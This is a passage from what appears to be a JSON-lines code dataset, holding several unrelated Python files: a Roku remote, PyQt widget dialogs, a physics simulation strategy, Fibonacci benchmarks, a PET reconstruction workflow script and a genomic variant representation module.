sendCommand(selectedRokuIP, \"keypress/Right\")\n\telif command==\"select\" or command==\"ok\": sendCommand(selectedRokuIP, \"keypress/Select\")\n\telif command==\"rw\" or command==\"rewind\": sendCommand(selectedRokuIP, \"keypress/Rev\")\n\telif command==\"ffw\" or command==\"fastforward\": sendCommand(selectedRokuIP, \"keypress/Fwd\")\n\telif command==\"home\": sendCommand(selectedRokuIP, \"keypress/Home\")\n\telif command[0:5]==\"text:\": sendText(selectedRokuIP, command[5:])\n\telif command==\"back\": sendCommand(selectedRokuIP, \"keypress/Back\")\n\telif command==\"backspace\" or command==\"bksp\": sendCommand(selectedRokuIP, \"keypress/Backspace\")\n\telif command==\"play\" or command==\"pause\": sendCommand(selectedRokuIP, \"keypress/Play\")\n\telif command==\"clear\":\n\t\tfor i in range(150):\n\t\t\tsendCommand(selectedRokuIP, \"keypress/Backspace\")\n#TODO: Implement all commands\n\telse:print(\"Bad command\")","sub_path":"Python/Command Line/RokuRemote.py","file_name":"RokuRemote.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"36068306","text":"import FWCore.ParameterSet.Config as cms\nfrom Validation.RecoTrack.TrackingParticleSelectionForEfficiency_cfi import * \nfrom SimTracker.TrackAssociation.LhcParametersDefinerForTP_cfi import * \nFlatTreeProducerBDT = cms.EDAnalyzer('FlatTreeProducerBDT',\n            lookAtAntiS = cms.untracked.bool(False),\n            runningOnData = cms.untracked.bool(False),\n            beamspot = cms.InputTag(\"offlineBeamSpot\"),\n            offlinePV = cms.InputTag(\"offlinePrimaryVertices\",\"\",\"\"),\n            genCollection_GEN = cms.InputTag(\"genParticles\",\"\",\"GEN\"),\n            genCollection_SIM_GEANT = cms.InputTag(\"genParticlesPlusGEANT\",\"\",\"\"),\n            generalTracksCollection = cms.InputTag(\"generalTracks\",\"\",\"RECO\"),\n            sexaqCandidates = cms.InputTag(\"lambdaKshortVertexFilter\", \"sParticles\",\"\"),\n            V0KsCollection = cms.InputTag(\"generalV0Candidates\",\"Kshort\",\"\"),\n            V0LCollection = cms.InputTag(\"generalV0Candidates\",\"Lambda\",\"\"),\n)\n","sub_path":"SexaQAnalysis/AnalyzerAllSteps/python/FlatTreeProducerBDT_cfi.py","file_name":"FlatTreeProducerBDT_cfi.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"164774816","text":"# encoding: utf-8\n# version: $Id: Widgets.py 276 2008-01-14 17:28:08Z jraedler $\n# author: Joerg Raedler \n# license: GPL v2\n\nfrom PyQt4.QtGui import QDialog, QDialogButtonBox, QVBoxLayout, QGridLayout, QLabel, QLineEdit,\\\n    QComboBox, QSpinBox, QDoubleSpinBox, QWidget, QCheckBox, 
QScrollArea, QTextEdit,\\\n QListWidget, QAbstractItemView, QDateTimeEdit, QHBoxLayout, QSizePolicy, QToolButton\nfrom PyQt4.QtCore import QCoreApplication, SIGNAL, Qt, QObject, QDateTime\n\nfrom RTypes import Text, MLText, Choice, MultiChoice, Float, Integer, Bool, DateTime\n\n\nrichTypeClasses = {\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Simple Text')): Text,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Multiline Text')): MLText,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Single Choice')): Choice,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Multiple Choice')): MultiChoice,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Boolean')): Bool,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Integer')): Integer,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Float')): Float,\n unicode(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Date+Time')): DateTime\n}\n\n\nclass RichTypesWidget(QWidget):\n\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Expanding)\n self.gridLayout = QGridLayout(self)\n self.richTypes = []\n self.qwidgets = []\n self.qlabels = []\n\n def addRichTypes(self, l):\n \"\"\"set the list of richtypes\"\"\"\n for q in l:\n i = len(self.richTypes)\n self.richTypes.append(q)\n l = QLabel(self)\n self.qlabels.append(l)\n l.setText(q.name)\n l.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.MinimumExpanding)\n l.setToolTip(q.descr)\n self.gridLayout.addWidget(l, i, 0, 1, 1)\n cls = q.__class__\n if cls == Text:\n w = QLineEdit(self)\n w.setMinimumSize(300, 30)\n if q.maxLen: w.setMaxLength(q.maxLen)\n w.setText(q.v)\n elif cls == MLText:\n w = QTextEdit(self)\n w.setAcceptRichText(False)\n w.setMinimumSize(300, 60)\n w.setText(q.v)\n elif cls == Choice:\n w = QComboBox(self)\n c = [unicode(x) for x in q.choices]\n c.sort()\n w.addItems(c)\n idx = w.findText(unicode(q.v))\n if idx >= 0:\n w.setCurrentIndex(idx)\n elif cls == MultiChoice:\n w = QListWidget(self)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.setMinimumSize(100, 60)\n c = [unicode(x) for x in q.choices]\n c.sort()\n v = [unicode(x) for x in q.v]\n for ii, s in enumerate(c):\n w.addItem(s)\n if s in v:\n w.item(ii).setSelected(True)\n elif cls == Bool:\n w = QCheckBox(self)\n if q.v:\n w.setCheckState(Qt.Checked)\n else:\n w.setCheckState(Qt.Unchecked)\n elif cls == Integer:\n w = QSpinBox(self)\n if q.min is not None:\n w.setMinimum(q.min)\n if q.max is not None:\n w.setMaximum(q.max)\n if q.step is not None:\n w.setSingleStep(q.step or 0.01)\n if q.unit: w.setSuffix(' '+q.unit)\n w.setValue(q.v)\n elif cls == Float:\n w = QDoubleSpinBox(self)\n if q.min is not None:\n w.setMinimum(q.min)\n if q.max is not None:\n w.setMaximum(q.max)\n w.setSingleStep(q.step or 0.01)\n if q.unit: w.setSuffix(' '+q.unit)\n w.setValue(q.v)\n elif cls == DateTime:\n w = QDateTimeEdit(self)\n w.setCalendarPopup(True)\n dt = QDateTime()\n dt.setTime_t(q.v)\n w.setDateTime(dt)\n if q.min is not None:\n mindt = QDateTime()\n mindt.setTime_t(q.min)\n w.setMinimumDate(mindt.date())\n if q.max is not None:\n maxdt = QDateTime()\n maxdt.setTime_t(q.max)\n w.setMaximumDate(maxdt.date())\n l.setBuddy(w)\n w.setToolTip(q.descr)\n w.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Expanding)\n w.adjustSize()\n self.gridLayout.addWidget(w, i, 1, 1, 1)\n self.qwidgets.append(w)\n self.adjustSize()\n\n\n def delRichTypes(self, *names):\n \"\"\"delete 
RichTypes by name, widgets get disabled but not deleted\"\"\"\n qq = [q for q in self.richTypes if q and q.name in names]\n for q in qq:\n i = self.richTypes.index(q)\n self.richTypes[i] = None\n self.qwidgets[i].setEnabled(False)\n self.qlabels[i].setEnabled(False)\n\n\n def applyChanges(self):\n for i in range(len(self.richTypes)):\n q = self.richTypes[i]\n if q is not None:\n w = self.qwidgets[i]\n cls = q.__class__\n if cls == Text:\n q.set(unicode(w.text()))\n elif cls == MLText:\n q.set(unicode(w.toPlainText()))\n elif cls == Choice:\n q.set(unicode(w.currentText()))\n elif cls == MultiChoice:\n q.set([unicode(ii.text()) for ii in w.selectedItems()])\n elif cls == Bool:\n q.set(w.checkState() == Qt.Checked)\n elif cls == DateTime:\n q.set(w.dateTime().toTime_t())\n else:\n q.set(w.value()) # Integer, Float\n return [q for q in self.richTypes if q is not None]\n\n\n\nclass SimpleRichTypesDialog(QDialog):\n \"\"\"Simple dialog to display and change RichTypes\"\"\"\n\n def __init__(self, parent=None, windowTitle='', scrolling=True, text=''):\n QDialog.__init__(self, parent)\n self.mainLayout = QVBoxLayout(self)\n self.textLabel = QLabel(self)\n self.textLabel.setText(text)\n self.mainLayout.addWidget(self.textLabel)\n if scrolling:\n self.scrollArea = QScrollArea(self)\n self.mainLayout.addWidget(self.scrollArea)\n self.richTypesWidget = RichTypesWidget(self.scrollArea)\n self.scrollArea.setWidget(self.richTypesWidget)\n self.scrollArea.setWidgetResizable(False)\n else:\n self.richTypesWidget = RichTypesWidget(self)\n self.mainLayout.addWidget(self.richTypesWidget)\n self.buttonBox = QDialogButtonBox(self)\n self.buttonBox.setOrientation(Qt.Horizontal)\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel | QDialogButtonBox.NoButton | QDialogButtonBox.Ok)\n self.mainLayout.addWidget(self.buttonBox)\n QObject.connect(self.buttonBox, SIGNAL('accepted()'), self.accept)\n QObject.connect(self.buttonBox, SIGNAL('rejected()'), self.reject)\n self.setWindowTitle(windowTitle)\n self.result = None\n\n def addRichTypes(self, l):\n \"\"\"set the list of richtypes\"\"\"\n self.richTypesWidget.addRichTypes(l)\n\n def accept(self):\n \"\"\"after dialog closes, RichType list is available as self.result\"\"\"\n self.result = self.richTypesWidget.applyChanges()\n QDialog.accept(self)\n\n\n\nclass ComplexRichTypesDialog(SimpleRichTypesDialog):\n \"\"\"complex dialog to display, change, add or delete RichTypes\"\"\"\n\n def __init__(self, parent=None, windowTitle='', scrolling=True, text=''):\n SimpleRichTypesDialog.__init__(self, parent, windowTitle, scrolling, text)\n self.editButtonLayout = QHBoxLayout()\n self.mainLayout.insertLayout(2, self.editButtonLayout)\n self.addButton = QToolButton(self)\n self.addButton.setText(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Add'))\n self.editButtonLayout.addWidget(self.addButton)\n self.delButton = QToolButton(self)\n self.delButton.setText(QCoreApplication.translate('RichTypes.Qt4Widgets', 'Delete'))\n self.editButtonLayout.addWidget(self.delButton)\n self.editButtonLayout.addStretch(100)\n self.connect(self.addButton, SIGNAL('pressed()'), self.newRichType)\n self.connect(self.delButton, SIGNAL('pressed()'), self.delRichTypes)\n\n\n def newRichType(self):\n N = Text('Name', 'new_item', maxLen=100)\n D = Text('Description', '-empty-', maxLen=300)\n clsNames = richTypeClasses.keys()\n T = Choice('Type', clsNames[0], choices=clsNames,\n descr=QCoreApplication.translate('RichTypes.Qt4Widgets', 'Select type'))\n txt = 
QCoreApplication.translate('RichTypes.Qt4Widgets', 'Select name, description and type')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'New Item'), text=txt, scrolling=False)\n dlg.addRichTypes((N, D, T))\n if not dlg.exec_():\n return\n name = dlg.result[0].v\n while name in [q.name for q in self.richTypesWidget.richTypes if q]:\n name = name + 'X'\n descr = dlg.result[1].v\n cls = richTypeClasses[dlg.result[2].v]\n if cls in (Choice, MultiChoice):\n C = MLText('choices', '')\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter choices (one per line)')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Choices'), text=txt, scrolling=False)\n dlg.addRichTypes((C,))\n if dlg.exec_():\n choices = [c for c in dlg.result[0].v.split('\\n') if c]\n self.richTypesWidget.addRichTypes((cls(name, descr=descr, choices=choices), ))\n elif cls == Float:\n # FIXME: adjust fMin, fMax\n fMin = -1e+10\n fMax = 1e+10\n MIN = Float('min', fMin, min=fMin, max=fMax)\n MAX = Float('max', fMax, min=fMin, max=fMax)\n STEP = Float('step', 1, min=0, max=fMax)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((MIN, MAX, STEP))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((Float(name, descr=descr, min=MIN.v, max=MAX.v, step=STEP.v), ))\n elif cls == Integer:\n # FIXME: adjust iMin, iMax\n iMin = -1e+5\n iMax = 1e+5\n MIN = Integer('min', iMin, min=iMin, max=iMax)\n MAX = Integer('max', iMax, min=iMin, max=iMax)\n STEP = Integer('step', 1, min=0, max=iMax)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((MIN, MAX, STEP))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((Integer(name, descr=descr, min=MIN.v, max=MAX.v, step=STEP.v), ))\n elif cls == DateTime:\n tMax = 2147483647\n MIN = DateTime('min', 0, min=0, max=tMax)\n MAX = DateTime('max', tMax, min=0, max=tMax)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((MIN, MAX))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((DateTime(name, descr=descr, min=MIN.v, max=MAX.v), ))\n elif cls in (Text, MLText):\n ML = Integer('maxLen', 1000, min=0, max=1e+5, step=1)\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Enter properties')\n dlg = SimpleRichTypesDialog(self, windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Properties'), text=txt, scrolling=False)\n dlg.addRichTypes((ML,))\n if dlg.exec_():\n self.richTypesWidget.addRichTypes((cls(name, descr=descr, maxLen=ML.v), ))\n else:\n self.richTypesWidget.addRichTypes((cls(name, descr=descr), ))\n\n\n def delRichTypes(self):\n qnames = [q.name for q in self.richTypesWidget.richTypes if q is not None]\n Q = MultiChoice('Items', [], choices=qnames, descr=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'RichTypes to delete'))\n txt = QCoreApplication.translate('RichTypes.Qt4Widgets', 'Select items to delete')\n dlg = SimpleRichTypesDialog(self, 
windowTitle=QCoreApplication.translate('RichTypes.Qt4Widgets',\n 'Delete items'), text=txt, scrolling=False)\n dlg.addRichTypes((Q,))\n if dlg.exec_():\n delNames = dlg.result[0].v\n self.richTypesWidget.delRichTypes(*delNames)\n\n\n\ndef testDialogs():\n import time\n tmp = ['Entry '+str(i) for i in range(10)]\n rt = []\n rt.append(Text('text', 'default text', descr='some text', maxLen=15))\n rt.append(Choice('choice', tmp[4], descr='you choose!', choices=tmp))\n rt.append(Integer('int', 42, descr='integer number', min=39, max=50, step=3, unit='kWh'))\n rt.append(Float('float', 42.42, descr='float number'))\n rt.append(Bool('bool', True, descr='boolean value'))\n rt.append(MLText('mltext', 'default text\\non two\\nlines', descr='some multiline text'))\n rt.append(MultiChoice('mchoice', (tmp[3], tmp[7]), descr='choose one or more', choices=tmp))\n rt.append(DateTime('datetime', int(time.time()), descr='date and time'))\n txt = 'Test of RichTypes.Qt4Widgets.ComplexRichTypesDialog'\n dlg = ComplexRichTypesDialog(None, windowTitle='Complex Test', text=txt, scrolling=True)\n dlg.addRichTypes(rt)\n if dlg.exec_():\n rt = dlg.result\n txt = 'Test of RichTypes.Qt4Widgets.SimpleRichTypesDialog'\n dlg = SimpleRichTypesDialog(None, windowTitle='Simple Test', text=txt, scrolling=True)\n dlg.addRichTypes(rt)\n if dlg.exec_():\n rt = dlg.result\n\n\n\nif __name__ == '__main__':\n import sys\n from PyQt4.QtGui import QApplication\n app = QApplication(sys.argv)\n testDialogs()\n #sys.exit(app.exec_())\n","sub_path":"Misc/RichTypes/Qt4Widgets.py","file_name":"Qt4Widgets.py","file_ext":"py","file_size_in_byte":14979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"652029433","text":"from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7\nfrom KratosMultiphysics import *\nfrom KratosMultiphysics.DEMApplication import *\nfrom KratosMultiphysics.SwimmingDEMApplication import *\n\nimport sphere_strategy\nBaseStrategy = sphere_strategy.ExplicitStrategy\n\nclass SwimmingStrategy(BaseStrategy):\n\n def IntegrationSchemeTranslator(self, name):\n class_name = BaseStrategy.IntegrationSchemeTranslator(self, name)\n\n if name == 'Hybrid_Bashforth':\n class_name = 'HybridBashforthScheme'\n\n return class_name\n\n def GetSchemeInstance(self, class_name): # parent counterpart must not be called due to different 'globals()'\n return globals().get(class_name)()\n\n def Initialize(self):\n BaseStrategy.Initialize(self)\n BaseStrategy.SetVariablesAndOptions(self)\n\n self.CheckMomentumConservation()\n\n self.cplusplus_strategy.Initialize() # Calls the cplusplus_strategy (C++) Initialize function (initializes all elements and performs other necessary tasks before starting the time loop in Python)\n\n def CreateCPlusPlusStrategy(self):\n self.SetVariablesAndOptions()\n print('self.Parameters.IntegrationScheme',self.Parameters.IntegrationScheme)\n print('self.Parameters.do_search_neighbours',self.Parameters.do_search_neighbours)\n\n if (self.Parameters.IntegrationScheme == 'Verlet_Velocity'):\n self.cplusplus_strategy = IterativeSolverStrategy(self.settings, self.max_delta_time, self.n_step_search, self.safety_factor,\n self.delta_option, self.creator_destructor, self.dem_fem_search,\n self.time_integration_scheme, self.search_strategy, self.Parameters.do_search_neighbours)\n\n elif (self.Parameters.IntegrationScheme == 'Hybrid_Bashforth'):\n self.cplusplus_strategy = 
AdamsBashforthStrategy(self.settings, self.max_delta_time, self.n_step_search, self.safety_factor,\n                                                             self.delta_option, self.creator_destructor, self.dem_fem_search,\n                                                             self.time_integration_scheme, self.search_strategy, self.Parameters.do_search_neighbours)\n\n        else:\n            self.cplusplus_strategy = ExplicitSolverStrategy(self.settings, self.max_delta_time, self.n_step_search, self.safety_factor,\n                                                             self.delta_option, self.creator_destructor, self.dem_fem_search,\n                                                             self.time_integration_scheme, self.search_strategy, self.Parameters.do_search_neighbours)\n\n\n","sub_path":"kratos/applications/swimming_DEM_application/python_scripts/swimming_sphere_strategy.py","file_name":"swimming_sphere_strategy.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"61249964","text":"import time\n\ndef fibo_recursion(num):\n    if num<=2:\n        return 1\n    return fibo_recursion(num-2) + fibo_recursion(num-1)\n\ndef fibo_iteration(n):\n    a, b = 1, 1\n\n    if n<=1:\n        return 1\n\n    for _ in range(1, n):\n        a, b = b, a+b\n\n    return a\n\ndef make_fibo():\n    cache = [0]*10000\n    def fibo_recursion(n):\n        nonlocal cache\n\n        # check the cache first\n        if cache[n-1] != 0:\n            return cache[n-1]\n\n        # base case\n        if n<=2:\n            cache[n-1] = 1\n            return 1\n\n        # recurrence relation\n        cache[n-1] = fibo_recursion(n-2) + fibo_recursion(n-1)\n        return cache[n-1]\n    return fibo_recursion\n
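\n# For comparison (illustrative sketch, not part of the timing test below):\n# functools.lru_cache from the standard library plays the same role as\n# make_fibo's hand-rolled cache list, and likewise stays within the recursion\n# limit only because callers grow n gradually.\nfrom functools import lru_cache\n\n@lru_cache(maxsize=None)\ndef fibo_lru(n):\n    if n <= 2:\n        return 1\n    return fibo_lru(n-2) + fibo_lru(n-1)\n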
\nif __name__==\"__main__\":\n\n    n = 10000\n\n    # recursion\n    # start = time.time()\n    # for i in range(1, n+1):\n    #     value = fibo_recursion(i)\n    # end = time.time()\n    # res = end-start\n    # print(f\"fibo_recursion : {res}\")\n\n    # iteration\n    start2 = time.time()\n    for i in range(1, n+1):\n        fibo_iteration(i)\n    end2 = time.time()\n    res2 = end2-start2\n    print(f\"fibo_iteration : {res2}\")\n\n    # recursion + memoization\n    start3 = time.time()\n    fibo=make_fibo()\n    for i in range(1, n+1):\n        fibo(i)\n    end3 = time.time()\n    res3 = end3-start3\n    print(f\"memoization : {res3}\")","sub_path":"algorithm/fibonacci/fibo_test.py","file_name":"fibo_test.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"622477670","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nfrom PyQt5.QtCore import QCoreApplication\n\nclass MyApp3(QWidget):\n\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n\n    def initUI(self):\n        # In PyQt5, event handling uses the signal & slot mechanism\n\n        btn = QPushButton('Quit', self)\n        btn.move(50,50)\n        btn.resize(btn.sizeHint())\n\n        # QCoreApplication.instance() returns the current application instance\n        btn.clicked.connect(QCoreApplication.instance().quit)\n\n        self.setWindowTitle(\"Quit Button\")\n        self.setGeometry(300,300,300,200)\n        self.show()\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = MyApp3()\n    sys.exit(app.exec_())\n","sub_path":"tutorial/tutorial_Quit.py","file_name":"tutorial_Quit.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"223044780","text":"#! /usr/bin/env python\n\nimport os.path\nimport sys\n\nsys.path.append(\"../scripts\")\n\nfrom petmatrix import SparseMatrixHeader\n\nfrom subprocess import run\nimport argparse\n\nrecalculate = False\n\nparser = argparse.ArgumentParser(description=\"Full reconstruction workflow\")\nparser.add_argument('--recalculate', '-r', action='store_true', dest='recalculate')\nargs, rest = parser.parse_known_args()\nrecalculate = args.recalculate\nprint(recalculate)\nprint(rest)\n\ndef run_and_check(cmd):\n    print(\"running \" + ' '.join(cmd))\n    info = run(cmd)\n    if info.returncode != 0:\n        sys.exit()\n\n# Prepare system matrix\nn_emissions = 400000\nif not os.path.isfile(\"m_big\"):\n    print(\"m_big file does not exist: recalculating\")\n    recalculate = True\nelse:\n    matrix_file = open(\"m_big\",\"rb\")\n    matrix = SparseMatrixHeader(matrix_file)\n    print(matrix.n_emissions)\n    if matrix.n_emissions != n_emissions:\n        recalculate = True\n\nrun([\"../2d_barrel_describe_scanner\",\"--big-barrel\",\"-o\",\"big_barrel\"])\n\n\nif recalculate:\n    run_and_check([\"../2d_barrel_matrix\", \"-c\", \"m_big_ref.cfg\",\n                   \"--detector-file\",\"big_barrel_dets.txt\",\n                   \"--detector-file-sym\",\"big_barrel_syms.txt\",\n                   \"-e\", \"%d\" % (n_emissions,), \"-o\", \"m_big\",\n                   \"-v\"])\n\n\n# Convert to full matrix\nif recalculate or not os.path.isfile(\"f_big\"):\n    run_and_check([\"../2d_barrel_matrix\", \"-c\", \"m_big.cfg\",\n                   \"--detector-file\",\"big_barrel_dets.txt\",\n                   \"--detector-file-sym\",\"big_barrel_syms.txt\",\n                   \"-o\", \"f_big\", \"-f\", \"m_big\"])\n\n\n# Prepare phantom\nn_phantom_emissions = 100000000\nif recalculate:\n    run_and_check([\"../3d_hybrid_phantom\", \"-c\", \"m_big.cfg\", \"-o\", \"p_sphere.txt\",\n                   \"-e\", \"%d\" % (n_phantom_emissions,), \"s_sphere.json\", \"-v\"])\n\n# Alternatively prepare phantom with GATE \n\n# Reconstruct\nif recalculate:\n    run_and_check([\"../3d_hybrid_reconstruction\", \"-c\", \"m_big.cfg\", \"--system\", \"f_big\", \"-o\", \"r_big\",\n                   \"-i\", \"10\", \"-v\", \"p_sphere.txt\"])\n","sub_path":"testbed/run_with_descriptor.py","file_name":"run_with_descriptor.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"54875276","text":"\"\"\"Module for generating VRS objects\"\"\"\nfrom typing import List, Optional, Tuple, Union, Dict\n\nfrom ga4gh.vrs import models, normalize\nfrom ga4gh.core import ga4gh_identify\nfrom cool_seq_tool.data_sources import SeqRepoAccess\nfrom bioutils.accessions import coerce_namespace\n\nfrom variation.schemas.token_response_schema import AltType, AMBIGUOUS_REGIONS\n\n\nclass VRSRepresentation:\n    \"\"\"Class for representing VRS objects\"\"\"\n\n    def __init__(self, seqrepo_access: SeqRepoAccess) -> None:\n        \"\"\"Initialize the VRSRepresentation class\n\n        :param SeqRepoAccess seqrepo_access: Access to SeqRepo\n        \"\"\"\n        self.seqrepo_access = seqrepo_access\n\n    @staticmethod\n    def get_ival_start_end(\n            coordinate: str, start: int, end: int, cds_start: int,\n            errors: List) -> Optional[Tuple[int, int]]:\n        \"\"\"Get ival_start and ival_end coordinates.\n\n        :param str coordinate: Coordinate used. 
Must be either `p`, `c`, or `g`\n :param int start: Start position change\n :param int end: End position change\n :param int cds_start: Coding start site\n :param List errors: List of errors\n :return: Tuple[ival_start, ival_end]\n \"\"\"\n try:\n start = int(start)\n if end is None:\n end = start\n end = int(end)\n except (ValueError, TypeError):\n errors.append(\"Start/End must be valid ints\")\n return None\n\n if coordinate == \"c\":\n if cds_start:\n start += cds_start\n end += cds_start\n return start, end\n\n @staticmethod\n def get_start_indef_range(start: int) -> models.IndefiniteRange:\n \"\"\"Return indefinite range given start coordinate\n\n :param int start: Start position (assumes 1-based)\n :return: Indefinite range model\n \"\"\"\n return models.IndefiniteRange(value=start - 1, comparator=\"<=\",\n type=\"IndefiniteRange\")\n\n @staticmethod\n def get_end_indef_range(end: int) -> models.IndefiniteRange:\n \"\"\"Return indefinite range given end coordinate\n\n :param int end: End position (assumes 1-based)\n :return: Indefinite range model\n \"\"\"\n return models.IndefiniteRange(value=end, comparator=\">=\",\n type=\"IndefiniteRange\")\n\n @staticmethod\n def get_ival_certain_range(start1: int, start2: int, end1: int,\n end2: int) -> models.SequenceInterval:\n \"\"\"Return sequence interval\n\n :param int start1: Start left pos (assumes 1-based)\n :param int start2: Start right pos (assumes 1-based)\n :param int end1: End left pos (assumes 1-based)\n :param int end2: End right pos (assumes 1-based)\n :return: Sequence Interval model\n \"\"\"\n return models.SequenceInterval(\n start=models.DefiniteRange(min=start1 - 1, max=start2 - 1,\n type=\"DefiniteRange\"),\n end=models.DefiniteRange(min=end1 + 1, max=end2 + 1,\n type=\"DefiniteRange\"),\n type=\"SequenceInterval\"\n )\n\n @staticmethod\n def get_sequence_loc(\n ac: str, interval: models.SequenceInterval) -> models.Location:\n \"\"\"Return VRS location\n\n :param str ac: Accession\n :param models.SequenceInterval interval: VRS sequence interval\n :return: VRS Location model\n \"\"\"\n return models.SequenceLocation(\n sequence_id=coerce_namespace(ac),\n interval=interval, type=\"SequenceLocation\")\n\n def vrs_allele(self, ac: str, interval: models.SequenceInterval,\n sstate: Union[models.LiteralSequenceExpression,\n models.DerivedSequenceExpression,\n models.RepeatedSequenceExpression],\n alt_type: AltType, errors: List) -> Optional[Dict]:\n \"\"\"Create a VRS Allele object.\n\n :param str ac: Accession\n :param SequenceInterval interval: Sequence Interval\n :param sstate: State\n :type sstate: models.LiteralSequenceExpression or\n models.DerivedSequenceExpression or\n models.RepeatedSequenceExpression\n :param AltType alt_type: Type of alteration\n :param List errors: List of errors\n :return: VRS Allele object represented as a Dict\n \"\"\"\n try:\n location = self.get_sequence_loc(ac, interval)\n except ValueError as e:\n errors.append(f\"Unable to get sequence location: {e}\")\n return None\n allele = models.Allele(location=location, state=sstate, type=\"Allele\")\n # Ambiguous regions do not get normalized\n if alt_type not in AMBIGUOUS_REGIONS:\n try:\n allele = normalize(allele, self.seqrepo_access)\n except (KeyError, AttributeError) as e:\n errors.append(f\"vrs-python unable to normalize allele: {e}\")\n return None\n\n if not allele:\n errors.append(\"Unable to get allele\")\n return None\n\n seq_id, w = self.seqrepo_access.translate_identifier(\n allele.location.sequence_id._value, \"ga4gh\")\n if seq_id:\n 
seq_id = seq_id[0]\n allele.location.sequence_id = seq_id\n allele.location._id = ga4gh_identify(allele.location)\n allele._id = ga4gh_identify(allele)\n return allele.as_dict()\n else:\n errors.append(w)\n return None\n\n def to_vrs_allele(\n self, ac: str, start: int, end: int, coordinate: str,\n alt_type: AltType, errors: List, cds_start: int = None,\n alt: str = None) -> Optional[Dict]:\n \"\"\"Translate accession and position to VRS Allele Object.\n\n :param str ac: Accession\n :param int start: Start position change\n :param int end: End position change\n :param str coordinate: Coordinate used. Must be either `p`, `c`, or `g`\n :param AltType alt_type: Type of alteration\n :param List errors: List of errors\n :param int cds_start: Coding start site\n :param str alt: Alteration\n :return: VRS Allele Object\n \"\"\"\n ival_coords = self.get_ival_start_end(coordinate, start, end,\n cds_start, errors)\n if not ival_coords:\n return None\n if ival_coords[0] > ival_coords[1]:\n ival_end, ival_start = ival_coords\n else:\n ival_start, ival_end = ival_coords\n\n # Right now, this follows HGVS conventions\n # This will change once we support other representations\n if alt_type == AltType.INSERTION:\n state = alt\n ival_end = ival_start\n elif alt_type in {AltType.SUBSTITUTION, AltType.DELETION, AltType.DELINS,\n AltType.SILENT_MUTATION, AltType.NONSENSE}:\n if alt_type == AltType.SILENT_MUTATION:\n state, _ = self.seqrepo_access.get_reference_sequence(ac, ival_start)\n if state is None:\n errors.append(f\"Unable to get sequence on {ac} from \"\n f\"{ival_start}\")\n return None\n else:\n state = alt or \"\"\n ival_start -= 1\n elif alt_type == AltType.DUPLICATION:\n ref, _ = self.seqrepo_access.get_reference_sequence(\n ac, ival_start, ival_end + 1)\n if ref is not None:\n state = ref + ref\n else:\n errors.append(f\"Unable to get sequence on {ac} from \"\n f\"{ival_start} to {ival_end + 1}\")\n return None\n ival_start -= 1\n else:\n errors.append(f\"alt_type not supported: {alt_type}\")\n return None\n\n interval = models.SequenceInterval(\n start=models.Number(value=ival_start, type=\"Number\"),\n end=models.Number(value=ival_end, type=\"Number\"),\n type=\"SequenceInterval\")\n sstate = models.LiteralSequenceExpression(sequence=state,\n type=\"LiteralSequenceExpression\")\n return self.vrs_allele(ac, interval, sstate, alt_type, errors)\n\n def to_vrs_allele_ranges(\n self, ac: str, coordinate: str, alt_type: AltType, errors: List,\n ival: models.SequenceInterval) -> Optional[Dict]:\n \"\"\"Translate variation ranges to VRS Allele Object.\n\n 